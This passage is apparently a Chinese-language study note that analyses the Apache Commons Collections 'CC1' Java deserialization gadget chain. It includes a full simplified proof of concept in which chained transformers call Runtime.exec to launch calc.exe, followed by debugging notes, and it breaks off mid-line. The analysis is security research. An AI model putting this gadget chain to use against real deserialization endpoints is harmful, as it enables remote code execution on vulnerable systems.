cc1链(jdk6)
简化cc1-仿
使用p牛的简化cc1进行分析:
package ysoserial.payloads;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import java.util.HashMap;
import java.util.Map;
public class cc1 {
public static void main(String[] args) throws Exception {
Transformer[] transformers = new Transformer[]{
new ConstantTransformer(Runtime.getRuntime()),
new InvokerTransformer("exec", new Class[]{String.class},
new Object[]
{"C:\\Windows\\System32\\calc.exe"}),
};
Transformer transformerChain = new ChainedTransformer(transformers);
Map innerMap = new HashMap();
Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
outerMap.put("test", "xxxx");
}
}
下断点进行debug:
一路f7发现漏洞点,excute确认漏洞所在
而此时的数据为字节流,于是反溯,可查看调用链:
TransformedMap.decorate用于把keyTransformer,valueTransformer定义进innerMap
Map outerMap = TransformedMap.decorate(innerMap, null, transformerChain);
keyTransformer,valueTransformer是继承了Transformer接口,用于处理新元素。
回到main中,定义了transformers
new Transformer[]{new ConstantTransformer(Runtime.getRuntime()),new InvokerTransformer("exec", new Class[]{String.class}, new Obj